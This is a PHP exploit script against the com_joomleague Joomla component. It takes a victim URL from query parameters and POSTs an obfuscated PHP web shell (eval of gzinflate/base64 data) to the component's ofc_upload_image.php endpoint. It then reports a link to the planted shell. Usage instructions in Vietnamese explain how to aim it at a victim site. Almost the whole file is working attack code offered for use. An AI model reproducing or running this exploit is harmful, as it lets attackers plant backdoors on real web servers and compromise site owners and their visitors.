<?php
echo <<<EOT
#  ----------------------------------------    <br />
#/   com_joomleague ~ Exploit                \ <br />
#\   Author: wantexz :: Edited: SilverWolf   / <br />
#  -----------------------------------------   <br />
EOT;

	$url = '';
	$file = '';
	if(isset($_GET['u']) && isset($_GET['f']))
	{
		$url     =  $_GET['u'];
		$file    =  $_GET['f'];
	}
	else
	{
		die("\n Cach su dung: http://mydomain.com/exp-joomleagure.php?u=http://victim.com/&f=up.php\n
			u=http://victim.com/    Duong dan toi trang chu Joomla (khong co index.php) \n
			f=up.php                Ten cua file duoc tao ta tren server victim.\n");

	}

	$shell = "{$url}//components/com_joomleague/assets/classes//tmp-upload-images/{$file}";
	$fullurl   = "{$url}//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name={$file}";

	//Noi dung cua file up.php
	//http://starious.net/upload.txt
	$data      = "<?php eval(gzinflate(base64_decode('XVHdSsMwFL7uYO+QhUIcuBavmwRBJojC1G1Xo5SsTUkwaUN3Ohziu5tkOtSrkPP9niRttZEHxNBtWt0/PC3XOxwnuCyS6STR7VUa7zvcCStxiWYMETL/8FiStqMxToDy8rR6Xb5sl+vNDocJLrO/uiIJdsHP9kdZjc70opFNFUg/EQSsqwKdlNcX7/k5K5G16hGm6oZTgdQgW0YuHMJXj4s7o+s3pOQgZzQXnOaeioug/Uxi+Od0Ek0IVWANp0qKhlPQYCTfxj4o9siyjObnsTeJpH3fnPh0Qtt+sMhKUH3DnlfrDZJdDScnGbajAe3EAHngLBoBAiNRg+47hnHQ6s6NgCIb5DugsCgL7f+B8f3xGf7+C/4bP4x7qwEdhRk9Yes8GjP9EWv6zmE9UnwB'))); ?>";

	$headers = array('Mozilla/5.0 (Windows NT 6.1; Intel Mac OS X 10.6; rv:7.0.1) Gecko/20100101 Firefox/7.0.1','Content-Type: text/plain');


	echo "        [+] Submitting request to: $url <br />";


	$handle = curl_init();

	curl_setopt($handle, CURLOPT_URL, $fullurl);
	curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
	curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
	curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

	$source = curl_exec($handle);
	curl_close($handle);

	if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
	{
		echo "<h3><font color='blue'>[+] Exploit completed successfully!</font></h3> <br />";
		echo "<a href=$shell> Shell link </a>";
	}
	else
	{
		echo "<h3><font color='red'>[+] Exploit was unsuccessful. </font></h3> <br />";
		echo "<h3><font color='red'>[+] Try <a href=$shell>this link</a> for sure </font></h3> <br />";
	}
	echo "RESPONSE DATA: <br />";
	var_dump($source);
	
	

?>